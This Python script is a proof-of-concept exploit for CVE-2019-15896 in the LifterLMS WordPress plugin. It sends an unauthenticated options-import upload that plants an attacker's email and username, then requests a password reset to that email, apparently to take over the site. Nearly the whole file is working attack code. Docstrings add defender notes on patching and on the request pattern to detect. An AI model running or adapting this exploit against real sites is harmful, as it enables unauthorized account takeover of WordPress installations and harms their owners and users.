#!/usr/bin/env python3
"""Proof-of-concept for CVE-2019-15896 (LifterLMS <= 3.34.5, "Unauthenticated Options Import").

What the script demonstrates (everything below is visible in the code itself):

* ``send_post_request`` uploads a JSON document as the ``llms_import`` file
  field of ``/wp-admin/admin.php?page=llms-import`` without sending any
  session cookie or other credential -- that is the point of the CVE: the
  import handler was reachable without authentication in affected versions.
* ``send_forgot_password_request`` then triggers the normal WordPress
  "lost password" flow for the e-mail address that was written into the
  imported document.

Defender notes:

* Mitigation is keeping the plugin updated; the affected range stated by the
  author is <= 3.34.5.
* Detection: a POST to ``admin.php?page=llms-import`` from a client that holds
  no WordPress session, followed shortly by a POST to
  ``wp-login.php?action=lostpassword``, is the request pattern this script
  produces.
* The script also reads ``lifter.json`` from the current working directory;
  that file is not part of this page, so its schema is not documented here.

Original header: Exploit script by @RandomRobbieBF.
"""
import requests
import argparse
import os

# Module-level side effect: these environment variables are set at import
# time, and ``requests`` honours HTTP_PROXY/HTTPS_PROXY by default, so every
# request made by this process is routed through 127.0.0.1:8080 (typically an
# interception proxy). If nothing is listening there, every request fails at
# connect time -- this is a hard-coded debugging aid, not a runtime option.
http_proxy = "http://127.0.0.1:8080"
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Ignore bad SSL: the two ``requests.post`` calls below pass ``verify=False``,
# which disables TLS certificate validation entirely (so the proxy above, or
# anything else on the path, is trusted); this only silences the warning
# that ``requests`` would otherwise print for each such call.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def send_forgot_password_request(url: str, email: str) -> requests.Response:
    """POST the standard WordPress "lost password" form for *email*.

    Args:
        url: Base URL of the WordPress site, without a trailing slash
            (it is concatenated directly with ``/wp-login.php``).
        email: Value sent as ``user_login``; WordPress accepts either a
            username or an e-mail address in this field.

    Returns:
        The ``requests.Response`` for the lost-password POST. The caller
        inspects ``response.text`` for WordPress's confirmation message.

    Raises:
        ``requests`` connection/HTTP errors propagate unchanged; nothing is
        caught here.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0",
        # Same-origin ``Origin`` header, mirroring what a browser would send.
        "Origin": f"{url}",
    }
    payload = {
        "user_login": email,
        "wp-submit": "Get New Password",
        "redirect_to": "",
    }
    # verify=False: certificate validation is disabled (see module header).
    response = requests.post(f"{url}/wp-login.php?action=lostpassword", data=payload,verify=False,headers=headers)
    return response


def send_post_request(url: str,email: str,username: str) -> requests.Response:
    """Upload ``lifter.json`` to the LifterLMS import page as an unauthenticated multipart POST.

    The local file ``lifter.json`` (current working directory; not shown on
    this page) is read as text, the literal placeholders ``EMAIL`` and
    ``USERNAME`` are substituted with the arguments, and the result is sent
    as the ``llms_import`` file field with content type ``application/json``.
    Note that no cookie or authentication header is set: the request relies
    on the affected plugin versions not checking authentication.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
        email: Replaces every occurrence of ``EMAIL`` in the template.
        username: Replaces every occurrence of ``USERNAME`` in the template.

    Returns:
        The ``requests.Response`` for the import POST. ``main`` does not
        inspect it, so a rejected import is not reported.

    Raises:
        ``FileNotFoundError`` if ``lifter.json`` is absent; ``requests``
        errors propagate unchanged.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0",
        # Referer/Origin mimic a form submission from the import page itself.
        "Referer": f"{url}/wp-admin/admin.php?page=llms-import",
        "Origin": f"{url}",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }
    with open('lifter.json', 'r') as file:
        content = file.read()
    # Plain string substitution: any other occurrence of these words in the
    # template would be replaced too.
    modified_content = content.replace("EMAIL", email).replace("USERNAME", username)
    files = {'llms_import': ('lifter.json', modified_content, 'application/json')}
    # verify=False: certificate validation is disabled (see module header).
    response = requests.post(f"{url}/wp-admin/admin.php?page=llms-import", files=files,headers=headers, verify=False)
    return response


def main() -> None:
    """Parse ``--url``, ``--email`` and ``--username``, run the two requests, and report the lost-password result.

    Only the lost-password response is checked (for WordPress's
    "check your email for the confirmation link" text); the import
    response is discarded.
    """
    print("LifterLMS <= 3.34.5 - Unauthenticated Options Import")
    print("Exploit By Ramdom Robbie")
    print("Once ran check your email for the forgotten password link.")
    parser = argparse.ArgumentParser(description="LifterLMS <= 3.34.5 - Unauthenticated Options Import")
    parser.add_argument('--url', required=True, help='URL of the WordPress site')
    parser.add_argument('--email', required=True, help='Email address to send forgotten password to')
    parser.add_argument('--username', required=True, help='Username of your user')
    args = parser.parse_args()
    url = args.url
    username = args.username
    email = args.email
    # NOTE(review): ``response`` is never inspected, so a failed or rejected
    # import (non-2xx, login redirect) goes unnoticed and the script proceeds
    # to the lost-password step regardless.
    response = send_post_request(args.url,email,username)
    response2 = send_forgot_password_request(url, email)
    # Substring match on the lower-cased page body; a localized WordPress
    # install would print a different message and fall into the else branch.
    if "check your email for the confirmation link" in response2.text.lower():
        print(f"Password reset email sent to {email}")
    else:
        print("Failed to send password reset email")


if __name__ == "__main__":
    main()